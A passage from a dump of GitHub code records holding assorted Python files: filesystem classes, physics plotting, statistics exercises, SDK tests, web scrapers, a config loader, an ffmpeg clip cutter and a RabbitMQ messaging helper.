data['space_used']\n memory.allocations = {\n int(addr): size for addr,\n size in data['allocations'].items()\n }\n memory.used_per_allocation = {\n int(addr): size for addr,\n size in data['used_per_allocation'].items()\n }\n memory.memory = data['memory']\n return memory\n\n\nclass FS_Node(ABC):\n memory: Memory\n\n def __init__(self, name: string, date_created: datetime) -> None:\n self.name = name\n self.date_created = date_created\n self.parent: FS_Node = None\n\n def print_directory_structure(self, level=0, max_level=10):\n if level > max_level:\n return\n\n print('\\t' * level,\n '--',\n utils.TColors.OKCYAN + utils.TColors.BOLD if isinstance(\n self, DirectoryNode) else '',\n self.name,\n utils.TColors.ENDC)\n if isinstance(self, DirectoryNode):\n for child in self.children:\n child.print_directory_structure(level + 1, max_level)\n\n def __dict__(self):\n return self.name\n\n def __str__(self) -> str:\n return self.name\n\n @classmethod\n def from_dict(cls, data):\n return data.get('type') == DirectoryNode.__name__ and DirectoryNode.from_dict(data) or FileNode.from_dict(data)\n\n\nclass DirectoryNode(FS_Node):\n def __init__(self, name: string, date_created: datetime) -> None:\n super().__init__(name, date_created)\n self.children: List[FS_Node] = []\n\n def add_child(self, child: FS_Node) -> FS_Node:\n self.children.append(child)\n child.parent = self\n return child\n\n def remove_child(self, child: FS_Node):\n self.children.remove(child)\n # child.__del__()\n\n def get_child(self, name: str):\n for child in self.children:\n if child.name == name:\n return child\n\n return None\n\n def __dict__(self):\n return {\n 'name': self.name,\n 'date_created': str(self.date_created),\n 'parent': str(self.parent) if self.parent else None,\n 'children': self.children,\n\n 'type': __class__.__name__\n }\n\n def __str__(self) -> str:\n return super().__str__()\n\n def __del__(self):\n # print('Deleting', self.name)\n for child in self.children:\n child.__del__()\n\n @classmethod\n def from_dict(cls, data):\n dir = DirectoryNode(\n data['name'], utils.get_datetime_object(data['date_created']))\n\n for child in data['children']:\n if child['type'] == FileNode.__name__:\n dir.add_child(FileNode.from_dict(child))\n elif child['type'] == DirectoryNode.__name__:\n dir.add_child(DirectoryNode.from_dict(child))\n\n return dir\n\n\nclass FileNode(FS_Node):\n STATE_CLOSE = 0\n STATE_OPEN = 1\n\n MODE_NONE = None\n MODE_READ = 'r'\n MODE_WRITE = 'w'\n 
MODE_APPEND = 'a'\n\n def __init__(self, name: string, date_created: datetime = datetime.datetime.now(), date_modified: datetime = datetime.datetime.now()) -> None:\n super().__init__(name, date_created)\n self.date_modified = date_modified\n self.starting_addr = -1\n self.size = 0\n\n self.state = FileNode.STATE_CLOSE\n self.mode: FileNode.MODE_NONE | FileNode.MODE_READ | FileNode.MODE_WRITE | FileNode.MODE_APPEND = FileNode.MODE_NONE\n\n def set_size(self, size):\n if 0 <= size < constants.MAX_FILE_SIZE:\n self.size = size\n\n raise ValueError(\n f'File size must be between 0 and {constants.MAX_FILE_SIZE / 1024} KB')\n\n def set_starting_addr(self, addr):\n if 0 <= addr < constants.TOTAL_MEMORY_SIZE:\n self.starting_addr = addr\n\n raise ValueError(\n f'Starting address must be between 0 and {constants.TOTAL_MEMORY_SIZE / 1024} KB')\n\n def __dict__(self):\n return {\n 'name': self.name,\n 'date_created': str(self.date_created),\n 'date_modified': str(self.date_modified),\n 'parent': str(self.parent) if self.parent else None,\n 'starting_addr': self.starting_addr,\n 'size': self.size,\n\n 'type': __class__.__name__\n }\n\n def __str__(self) -> str:\n return super().__str__()\n\n def __del__(self):\n if self.starting_addr != -1 and self.size != 0:\n FS_Node.memory.deallocate(self.starting_addr)\n # print('Deallocated memory', self.starting_addr)\n\n @classmethod\n def from_dict(cls, data):\n file = FileNode(data['name'], utils.get_datetime_object(\n data['date_created']), utils.get_datetime_object(data['date_modified']))\n file.parent = data['parent']\n file.starting_addr = data['starting_addr']\n file.size = data['size']\n\n return file\n","repo_name":"Ayeshas09/filesystem","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":10455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38818872045","text":"#############################\n# #\n# POINT 3 IN PROBLEM 8 #\n# #\n#############################\nfrom platform import platform\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# The filenames of the files the data will be extracted from\nfilename_1 = \"two_particle_data_w_int.txt\" # With interactions\nfilename_2 = \"two_particle_data_no_int.txt\" # Without interactions\n# Both files has this header (the comment under is just to have \n# somewhat control of placement numbering):\n# Time, x1, x2, y1, y2, z1, z2, vx1, vx2, vy1, vy2, vz1, vz2\n# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12\n\n\n\n# This plots two particles movement in a Penning trap, in the x,vx-plane and the z,vz-plane\ndef two_particle_penning_xzv(filename_1,filename_2):\n\n # Creating an empty lists for both the particles in the Penning trap with (w) and \n # without (wo) interactions.\n # Particle 1:\n x1_w = []\n z1_w = []\n vx1_w = []\n vz1_w = []\n x1_wo = []\n z1_wo = []\n vx1_wo = []\n vz1_wo = []\n # Particle 2:\n x2_w = []\n z2_w = []\n vx2_w = []\n vz2_w = []\n x2_wo = []\n z2_wo = []\n vx2_wo = []\n vz2_wo = []\n \n\n\n ######################################################\n # WITH INTERACTIONS #\n # Extracts the data for the trajectory with #\n # interactions #\n ######################################################\n with open(filename_1) as f: \n next(f) # Skipping the header (top) row\n text = f.read()\n\n # Splitting it by \\n\n line_ls = text.split('\\n')\n del line_ls[-1] # Last line is empty, so we delete it, bitch bye\n\n for i in line_ls:\n line_cont_ls = i.split(\",\") # List of values in the 
line\n\n\n # Extracting values from filename_1\n x1_w_val = line_cont_ls[1]\n z1_w_val = line_cont_ls[5]\n vx1_w_val = line_cont_ls[7]\n vz1_w_val = line_cont_ls[11]\n x2_w_val = line_cont_ls[2]\n z2_w_val = line_cont_ls[6]\n vx2_w_val = line_cont_ls[8]\n vz2_w_val = line_cont_ls[12]\n\n # Adding the values to the belonging lists\n x1_w.append(x1_w_val)\n z1_w.append(z1_w_val)\n vx1_w.append(vx1_w_val)\n vz1_w.append(vz1_w_val)\n x2_w.append(x2_w_val)\n z2_w.append(z2_w_val)\n vx2_w.append(vx2_w_val)\n vz2_w.append(vz2_w_val)\n\n\n\n ######################################################\n # WITHOUT INTERACTIONS #\n # Extracts the data for the trajectory without #\n # interactions #\n ######################################################\n with open(filename_2) as f: \n next(f)\n text = f.read()\n line_ls = text.split('\\n')\n del line_ls[-1] # Last line is empty, so we delete it, bitch bye\n\n for j in line_ls:\n line_cont_ls = j.split(\",\") # List of values in the line\n\n # Extracting values from filename_2\n x1_wo_val = line_cont_ls[1]\n z1_wo_val = line_cont_ls[5]\n vx1_wo_val = line_cont_ls[7]\n vz1_wo_val = line_cont_ls[11]\n x2_wo_val = line_cont_ls[2]\n z2_wo_val = line_cont_ls[6]\n vx2_wo_val = line_cont_ls[8]\n vz2_wo_val = line_cont_ls[12]\n\n # Adding the values to the belonging lists\n x1_wo.append(x1_wo_val)\n z1_wo.append(z1_wo_val)\n vx1_wo.append(vx1_wo_val)\n vz1_wo.append(vz1_wo_val)\n x2_wo.append(x2_wo_val)\n z2_wo.append(z2_wo_val)\n vx2_wo.append(vx2_wo_val)\n vz2_wo.append(vz2_wo_val)\n\n # Returning all the complete lists\n return x1_w,z1_w,vx1_w,vz1_w,x1_wo,z1_wo,vx1_wo,vz1_wo,x2_w,z2_w,vx2_w,vz2_w,x2_wo,z2_wo,vx2_wo,vz2_wo\n\n\n\n\n\n# RUNNING THE CODE\nx1_w,z1_w,vx1_w,vz1_w,x1_wo,z1_wo,vx1_wo,vz1_wo,x2_w,z2_w,vx2_w,vz2_w,x2_wo,z2_wo,vx2_wo,vz2_wo = two_particle_penning_xzv(filename_1,filename_2)\n\n\n\n######################################################\n# PLOTTING #\n# Plotting all 4 plots, saving them, one at a time #\n######################################################\n\n# PLOT 1: For two particles' trajectories with interactions in the (x,vx) plane\nplt.plot(np.asarray(x1_w,float), np.asarray(vx1_w,float), color='forestgreen', label='Particle 1')\nplt.plot(np.asarray(x2_w,float), np.asarray(vx2_w,float), color='limegreen', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, with interactions')\nplt.xlabel('x [\\u03bcm]')\nplt.ylabel('$v_x$ [\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_x_w.svg\", format=\"svg\") \nplt.close()\n\n# PLOT 2: For two particles' trajectories without interactions in the (x,vx) plane\nplt.plot(np.asarray(x1_wo,float), np.asarray(vx1_wo,float), color='teal', label='Particle 1')\nplt.plot(np.asarray(x2_wo,float), np.asarray(vx2_wo,float), color='mediumturquoise', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, without interactions')\nplt.xlabel('x [\\u03bcm]')\nplt.ylabel('$v_x$ [\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_x_wo.svg\", format=\"svg\") \nplt.close()\n\n# PLOT 3: For two particles' trajectories with interactions in the (z,vz) plane\nplt.plot(np.asarray(z1_w,float), np.asarray(vz1_w,float), color='salmon', label='Particle 1')\nplt.plot(np.asarray(z2_w,float), np.asarray(vz2_w,float), color='red', label='Particle 2')\nplt.title('Trajectories in the (z,$v_z$)-plane, with interactions')\nplt.xlabel('z [\\u03bcm]')\nplt.ylabel('v\\_{z}[\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_z_w.svg\", format=\"svg\") 
\nplt.close()\n \n# PLOT 4: For two particles' trajectories without interactions in the (z,vz) plane\nplt.plot(np.asarray(z1_wo,float), np.asarray(vz1_wo,float), color='darkmagenta',label='Particle 1')\nplt.plot(np.asarray(z2_wo,float), np.asarray(vz2_wo,float), color='orchid', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, without interactions')\nplt.xlabel('z [\\u03bcm]')\nplt.ylabel('$v_z$[\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_z_wo.svg\", format=\"svg\") \nplt.close()","repo_name":"siljevik/FYS4150","sub_path":"Project_3/8/two_particles_penning_traj.py","file_name":"two_particles_penning_traj.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"10265880415","text":"import statistics as stats\nimport math\nn = int(input())\narr = list(map(int,input().split(\" \")))\narr.sort()\nq2 = stats.median(arr)\nleft = arr[:int(n/2)] if n%2 == 0 else arr[:math.floor(n/2)]\nq1 = int(stats.median(left))\nright = arr[int(n/2):] if n%2 == 0 else arr[math.ceil(n/2):]\nq3 = int(stats.median(right))\nprint(\"%d\\n%d\\n%d\"%(q1,q2,q3))\n","repo_name":"omkarsk98/Data-Structures","sub_path":"HackerRank/10DaysOfStatistics/Day1:Quartiles.py","file_name":"Day1:Quartiles.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"19721784491","text":"def _get_models(data):\n \"\"\"Returns set of models defined within an input file.\n\n \"\"\"\n return data['RESULTS'].keys()\n\n\ndef _get_reference_types(data):\n \"\"\"Returns set of reference types defined within an input file.\n\n \"\"\"\n return [(i, u\"{}Reference\".format(i)) for i in set(data['References'].keys())]\n\n\ndef _get_simulation(data, model):\n \"\"\"Returns simulation name.\n\n \"\"\"\n return data['RESULTS'][model]['SimulationDescription']['Realization']\n\n\ndef _get_regions(data):\n \"\"\"Returns set of regional maskings defined within an input file.\n\n \"\"\"\n return data['RegionalMasking'].keys()\n\n\ndef _get_variable(data):\n \"\"\"Returns variable name within an input file.\n\n \"\"\"\n if 'level' in data['Variable']:\n return \"{}-{}\".format(data['Variable']['id'], int(data['Variable']['level']))\n return data['Variable']['id']\n\n\ndef _get_metrics(data, reference_type_key, model, simulation, masking):\n \"\"\"Returns collection of metrics.\n\n \"\"\"\n result = dict()\n\n metrics = data['RESULTS'][model][reference_type_key][simulation][masking]\n for metric_name in metrics:\n for period in metrics[metric_name]:\n result[\"{}_{}\".format(metric_name, period)] = metrics[metric_name][period]\n\n return result\n\n\ndef _get_groups(data):\n \"\"\"Returns set of metric groups defined within an input file.\n\n \"\"\"\n result = []\n for reference_type, reference_type_key in _get_reference_types(data):\n variable = _get_variable(data)\n for model in _get_models(data):\n simulation = _get_simulation(data, model)\n for region in _get_regions(data):\n masking = region\n try:\n result.append((\n reference_type,\n model,\n simulation,\n masking,\n region,\n variable,\n _get_metrics(data, reference_type_key, model, simulation, masking)\n ))\n except KeyError:\n pass\n\n return result\n\n\ndef decode(data):\n \"\"\"Decodes set of metrics files.\n\n :param list data: Raw metrics data.\n\n :returns: Input data to be transformed.\n :rtype: list\n\n \"\"\"\n return (data, 
_get_groups(data))\n","repo_name":"ESPRI-Mod/hermes-client","sub_path":"hermes_client/metrics/formatter/decoder_pcmdi_2.py","file_name":"decoder_pcmdi_2.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13893840305","text":"import unittest\n\nfrom uuid import uuid4\nfrom statsig.statsig_error_boundary import _StatsigErrorBoundary\nfrom statsig.statsig_event import StatsigEvent\nfrom statsig.statsig_metadata import _StatsigMetadata\nfrom statsig.statsig_network import _StatsigNetwork\nfrom statsig.statsig_user import StatsigUser\nfrom statsig import globals\nfrom statsig import StatsigOptions\n\nclass TestNetwork(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # This test logspews expected errors, but the test itself should pass\n globals.logger._disabled = False\n metadata = _StatsigMetadata.get()\n cls.net = _StatsigNetwork(\"secret-test\", StatsigOptions(disable_diagnostics=True), metadata, _StatsigErrorBoundary())\n cls.net._raise_on_error = True\n\n @classmethod\n def tearDownClass(cls):\n globals.logger._disabled = True\n\n def test_invalid_user(self):\n user = StatsigUser(user_id= \"123\", custom={'field': uuid4()})\n event = StatsigEvent(user, \"test_event\")\n # request fails due to json serialization of user\n self.assertRaises(\n TypeError,\n self.net.retryable_request,\n \"log_event\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n \n def test_invalid_metadata(self):\n user = StatsigUser(user_id= \"123\", )\n event = StatsigEvent(user, \"test_event\", None, {'field': uuid4()})\n # request fails due to json serialization of event\n self.assertRaises(\n TypeError,\n self.net.retryable_request,\n \"log_event2\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n \n def test_invalid_post(self):\n user = StatsigUser(user_id= \"123\", )\n event = StatsigEvent(user, \"test_event\", None, {'field': uuid4()})\n # request fails due to json serialization of event\n self.assertRaises(\n TypeError,\n self.net.post_request,\n \"log_event3\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n","repo_name":"statsig-io/python-sdk","sub_path":"tests/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"41460812425","text":"import itertools\n\na = list(itertools.product('МЕТРО', repeat=4))\n\ncounter = 0\n\nfor element in a:\n element = ''.join(element)\n if element[0] in 'МТР' and element[-1] in 'ЕО':\n counter += 1\n\nprint(counter)\n","repo_name":"shlyapp/ege-informatika","sub_path":"udgu/2/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"23138921077","text":"import re\n\nimport psycopg2 as psycopg2\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom app.config import settings\nfrom app.parser.data.headers import HEADERS\nfrom app.parser.data.headers import MOBILE_USER_AGENTS\n\nURL = 'http://www.volleymsk.ru/ap/members.php?id=7548'\nlastURL = 'http://www.volleymsk.ru/ap/members.php?id=7983'\npage = requests.get(lastURL, headers=HEADERS)\nsoup = BeautifulSoup(page.content, 'html.parser')\ntables = soup.find_all('table')[4]\ntable = tables.find_all('table')[7]\ninfo = (' '.join(table.text.split()).split('Игрок'))\nif 'Тренер' in ' '.join(info):\n info = ' 
'.join(table.text.split()).split('Тренерский')[0].split('Игрок')\nteam_info = info[0]\nplayers = info[2:]\nnums = re.findall(r'\\b\\d+\\b', team_info)\ninf = {\n 'Команда': ' '.join(team_info.split(':')[1].split()[:-1]),\n 'Рост': nums[-3],\n 'Возраст': f'{nums[-2]}.{nums[-1]}'\n}\nfor i in players:\n player = {\n 'Команда': ' '.join(team_info.split(':')[1].split()[:-1]),\n 'ФИО': ' '.join(i.split(':')[1].split()[:-1]),\n 'Рост': i.split(':')[2].split()[0],\n 'Мастерство': re.findall(r'[А-Я][а-я]*', i.split(':')[-2])[0] if i.count(':') == 4 else i.split(':')[-1],\n 'Год рождения': i.split(':')[-1].strip() if i.count(':') == 4 else None\n }\n print(player)\nfor k, v in inf.items():\n print(k, ':', type(v))\nprint(round(float(inf['Возраст'])))","repo_name":"2haed/lvl_parser","sub_path":"app/parser/async_team_info_parser.py","file_name":"async_team_info_parser.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"6203533960","text":"# 279. Perfect Squares\n# medium\n\nclass Solution:\n def numSquares(self, n: 'int') -> 'int':\n cnts = [n] * (n + 1)\n cnts[0] = 0\n for i in range(1, n + 1):\n for j in range(1, int(math.sqrt(i)) + 1):\n cnts[i] = min(cnts[i], cnts[i - j ** 2] + 1)\n return cnts[n]\n","repo_name":"moyuanhuang/leetcode","sub_path":"dp/perfect_squares.py","file_name":"perfect_squares.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"13253114740","text":"from tqdm import tqdm\nfrom transformers.pipelines.pt_utils import KeyDataset\n\ndef get_predictions_via_generation_pipeline(HF_dataset, model_name, min_length=5, max_length=128, device=0, batch_size=16):\n\t\n\t\"\"\"\n\tdata: list of strings\n\tmodel_name: string\n\treturn_all_scores: str: \"ditribution\", for all; \"present\" for above threshold\n\tmax_length: int\n\ttruncation: bool\n\t\"\"\"\n\t\n\tfrom transformers import pipeline\n\n\t\n\tpipe = pipeline(\n\t task=\"text2text-generation\",\n\t model=model_name, \n\t tokenizer=model_name,\n\t device=device,\n\t)\n\n\tpredictions = []\n\tfor out in tqdm(pipe(KeyDataset(HF_dataset, \"dreams\"), min_length=min_length, max_length=max_length, batch_size=batch_size)):\n\t predictions.append(out[0][\"generated_text\"])\n\n\treturn predictions","repo_name":"lorenzoscottb/DReAMy","sub_path":"dreamy/util/generation_pipeline.py","file_name":"generation_pipeline.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"45"} +{"seq_id":"30685498250","text":"# -*- encoding: utf-8 -*-\n\"\"\"Config oauth.\n\nVARS:\n\nREDIS_HOST = 'redis'\nREDIS_PORT = 6379\nJWT_SECRET = 'secret'\nLDAP = 'ldap:10389'\nROOT_PW = 'secret'\nROOT_DN = 'uid=admin,ou=system'\nDOMAIN = 'dc=example,dc=com'\nUSERFILTER = 'mail={username},ou=users,dc=example,dc=com'\nMANAGER = 'admin@tickdi.com'\n\nCORS = 'http://localhost:4200,https://example.com'\nDEBUG = True\nSMTP_SERVER = '---''\nSMTP_PORT = 587\nSMTP_USER = '---'\nSMTP_PW = '---'\nSMTP_TLS = True\nSMTP_SSL = False\n\n\"\"\"\n\nimport os\nimport json\n\nREDISHOST = os.environ.get('REDIS_HOST', 'redis')\nREDISPORT = int(os.environ.get('REDIS_PORT', \"tcp://x.x.x.x:6379\").split(\":\")[-1])\nJWTSECRET = os.environ.get('JWT_SECRET', 'secret')\nLDAP = os.environ.get('LDAP', 'ldap:10389')\nROOTPW = os.environ.get('ROOT_PW', 'secret')\nROOTDN = os.environ.get('ROOT_DN', 
'uid=admin,ou=system')\nDOMAIN = os.environ.get('DOMAIN', 'dc=example,dc=com')\nUSERFILTER = os.environ.get(\n 'USER_FILTER', 'mail={username},ou=users,dc=example,dc=com')\nMANAGER = os.environ.get('MANAGER', 'admin@example.com')\nCORS = os.environ.get('CORS', ['http://localhost:4200','https://example.com'])\nDEBUG = os.environ.get('DEBUG', True)\nSMTPSERVER = os.environ.get(\n 'SMTP_SERVER', 'smtp.gmail.com')\nSMTPPORT = int(os.environ.get('SMTP_PORT', 587))\nSMTPUSER = os.environ.get('SMTP_USER', '---')\nSMTPPW = os.environ.get(\n 'SMTP_PW', '---')\nSMTPTLS = bool(os.environ.get('SMTP_TLS', 'True').upper() == 'TRUE')\nSMTPSSL = bool(os.environ.get('SMTP_SSL', 'False').upper() == 'FALSE')\n\nwith open(\"config.json\") as fp:\n config = json.load(fp)\n\nconfig['jwtsecret'] = JWTSECRET\nconfig['redis.host'] = REDISHOST\nconfig['redis.port'] = str(REDISPORT)\nconfig['ldap.server'] = LDAP\nconfig['ldap.config_server'] = LDAP\nconfig['ldap.config_root_pw'] = ROOTPW\nconfig['ldap.root_pw'] = ROOTPW\n\nconfig['ldap.root_dn'] = ROOTDN\nconfig['ldap.config_root_dn'] = ROOTDN\n\nconfig['ldap.user_filter'] = USERFILTER\nconfig['ldap.base_dn'] = DOMAIN\nconfig['ldap.config_dn'] = 'ou=config,%s' % DOMAIN\n\nconfig['manager'] = MANAGER\n\nconfig['cors'] = CORS\nconfig['debug'] = 'True' if DEBUG else 'False'\n\nconfig['mail.host'] = SMTPSERVER\nconfig['mail.port'] = str(SMTPPORT)\nconfig['mail.username'] = SMTPUSER\nconfig['mail.password'] = SMTPPW\nconfig['mail.tls'] = 'True' if SMTPTLS else 'False'\nconfig['mail.ssl'] = 'True' if SMTPSSL else 'False'\n\nwith open('config.json', 'w') as configfile:\n json.dump(config, configfile, sort_keys=True, indent=4, separators=(',', ': '))\n","repo_name":"pyrenees/plone.oauth","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26834593783","text":"import flask\nimport libgenapi\nimport json\nfrom urllib.request import urlopen as uReq\nimport requests\nfrom bs4 import BeautifulSoup as soup\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

    Distant Reading Archive\n\n    This site is a prototype API for distant reading of science fiction novels.\n
    \"\n\n\ndef url_opener(mirror):\n\turl=mirror\n\tuClient=uReq(url)\n\tpage_html=uClient.read()\n\tuClient.close()\n\tpage_soup=soup(page_html,\"html.parser\")\n\tcontainers=page_soup.find(\"div\",{\"class\":\"book-info\"})\n\tname=containers.find(\"div\",{\"class\":\"book-info__title\"}).text\n\tdownload_class=containers.find(\"div\",{\"class\":\"book-info__download\"})\n\tlink=download_class.find('a').get(\"href\")\n\t#print(name)\n\t#print(link)\n\tmagic_no=link[10:]\n\t#print(magic_no)\n\tdowloader_url=\"https://libgen.pw/download/book/\"+magic_no\n\treturn (name,dowloader_url)\n#\tr=requests.get(dowloader_url,stream=True)\n#\twith open(name+\".pdf\",\"wb\") as pdf: \n#\t for chunk in r.iter_content(chunk_size=1024): \n#\t # writing one chunk at a time to pdf file \n#\t if chunk: \n#\t pdf.write(chunk) \n\n@app.route('/search/', methods=['GET'])\ndef api_id(name):\n\n\tlg=libgenapi.Libgenapi([\"http://libgen.io/\",\"http://gen.lib.rus.ec\"]) \n\t#name=input(\"Enter the name of the book: \")\n\toutput=lg.search(name);\n\t#json_output=json.load(output)\n\tjson_output=json.dumps (output, sort_keys=True,indent=4)\n\t#print(json_output)\n\tloaded_data=json.loads(json_output)\n\tresult=[]\n\tfor data in loaded_data:\n\t\tif(data[\"mirrors\"]!=None):# and (data[\"extension\"]==\"pdf\" or data[\"extension\"]==\"epub\")):\n\t\t\tfor mirror in data[\"mirrors\"]:\n\t\t\t\tif(mirror.startswith(\"http://libgen.pw\")):\n\t\t\t\t\tprint(mirror)\n\t\t\t\t\tname,url=url_opener(mirror)\n\t\t\t\t\tprint(name)\n\t\t\t\t\tprint(url)\n\t\t\t\t\tresult.append({\"name\":name,\n\t\t\t\t\t\t\t\t\t\"url\":url})\n\t\t\t\t\tprint(\"\\n\\n\")\n\tresult=json.dumps(result,indent=2)\n\treturn (result)\n\n\n\napp.run()","repo_name":"ArpitKubadia/thetreeofknowledge","sub_path":"backend_searching.py","file_name":"backend_searching.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"398217914","text":"import json\nimport subprocess\nimport os\n\ndef main():\n with open('images/info.json', 'r', encoding='utf-8') as f:\n info = json.load(f)\n info_short = []\n dateOld = \"\"\n for dt in info['short']:\n filename = dt[\"fileName\"]\n playTime = dt[\"playTime\"]\n time1 = playTime[0][0] * 60 + playTime[0][1]\n time2 = playTime[1][0] * 60 + playTime[1][1]\n thumbTime = dt['thumbnailTime']\n comment = dt[\"comment\"]\n date = dt[\"date\"]\n if date != dateOld:\n count = 0\n else:\n count += 1\n new_filename = f\"{date}_{count}.mp4\"\n #cmd = f\"ffmpeg -ss {time1} -to {time2} -i images/images/{filename} -c copy images/images/{new_filename}\"\n cmd = f\"ffmpeg -ss {time1} -to {time2} -i images/images/{filename} images/images/{new_filename}\"\n dateOld = date\n #if not os.path.exists(f'images/images/{new_filename}'):\n # subprocess.run(cmd)\n timeThumbSec = (thumbTime[0] * 60 + thumbTime[1]) - time1\n totalTime = time2 - time1\n if timeThumbSec == totalTime:\n timeThumbSec -= 0.1\n timeThumbMin = timeThumbSec // 60\n timeThumbSec = timeThumbSec % 60\n totalTimeMin = totalTime // 60\n totalTimeSec = totalTime % 60\n xxx = {\"fileName\": new_filename,\n \"comment\": comment,\n \"date\": date,\n \"thumbnailFile\": new_filename,\n \"thumbnailTime\": [timeThumbMin, timeThumbSec],\n \"totalTime\" : [totalTimeMin, totalTimeSec]\n }\n info_short.append(xxx)\n with open(\"images/info_short_2.json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(info_short, f, ensure_ascii=False, indent=2)\n\nif __name__ == '__main__':\n 
main()","repo_name":"yutera12/movie_player","sub_path":"cutMovies.py","file_name":"cutMovies.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15751653985","text":"import pika\nimport json\nimport threading\nimport uuid\nfrom exchange import json_generic\n\n\nclass Event(json_generic.JSONSerializibleMixin):\n\n def __init__(self):\n self.name = type(self).__name__\n\n def is_an(self, event_class):\n return type(self).__name__ == event_class.__name__\n\n\ndef message_handler(callback):\n def handler(ch, method, properties, body):\n event = json_generic.decode(body.decode(\"utf-8\"))\n response = callback(event)\n if response and properties.reply_to:\n response_json = json_generic.encode(response)\n ch.basic_publish(exchange='',\n routing_key=properties.reply_to,\n properties=pika.BasicProperties(correlation_id=properties.correlation_id),\n body=response_json)\n return handler\n\n\nclass Messenger(object):\n def __init__(self, message_broker_host):\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=message_broker_host))\n self.channel = self.connection.channel()\n self.channel.exchange_declare(exchange='frontend', type='fanout')\n self.channel.exchange_declare(exchange='backend', type='direct')\n\n self.response_queue = self.channel.queue_declare(exclusive=True).method.queue\n self.response_callbacks = {}\n self.channel.basic_consume(self._process_response, no_ack=True, queue=self.response_queue)\n\n self.consume_thread = None\n\n def _process_response(self, ch, method, properties, body):\n if properties.correlation_id in self.response_callbacks:\n event = json_generic.decode(body.decode(\"utf-8\"))\n\n self.response_callbacks[properties.correlation_id](event)\n del(self.response_callbacks[properties.correlation_id])\n\n def _add_response_callback(self, callback):\n correlation_id = str(uuid.uuid4())\n self.response_callbacks[correlation_id] = callback\n return pika.BasicProperties(\n reply_to=self.response_queue,\n correlation_id=str(correlation_id)\n )\n\n def subscribe_frontend(self, callback):\n queue = self.channel.queue_declare(exclusive=True).method.queue\n self.channel.queue_bind(exchange='frontend', queue=queue)\n self.channel.basic_consume(message_handler(callback), queue=queue, no_ack=True)\n\n def subscribe_backend(self, subscriber_name, callback):\n queue = self.channel.queue_declare(exclusive=True).method.queue\n self.channel.queue_bind(exchange='backend', queue=queue, routing_key=subscriber_name)\n self.channel.basic_consume(message_handler(callback), queue=queue, no_ack=True)\n\n def publish_to_frontend(self, event, response_callback=None):\n event_json = json_generic.encode(event)\n properties = None\n if response_callback:\n properties = self._add_response_callback(response_callback)\n self.channel.basic_publish(exchange='frontend', routing_key='',\n body=event_json, properties=properties)\n\n def publish_to_backend(self, subscriber_name, event, response_callback=None):\n event_json = json_generic.encode(event)\n properties = None\n if response_callback:\n properties = self._add_response_callback(response_callback)\n self.channel.basic_publish(exchange='backend', routing_key=subscriber_name,\n body=event_json, properties=properties)\n\n def wait_for_messages(self, non_blocking=True):\n if non_blocking:\n self.consume_thread = threading.Thread(target=self.channel.start_consuming)\n self.consume_thread.start()\n else:\n 
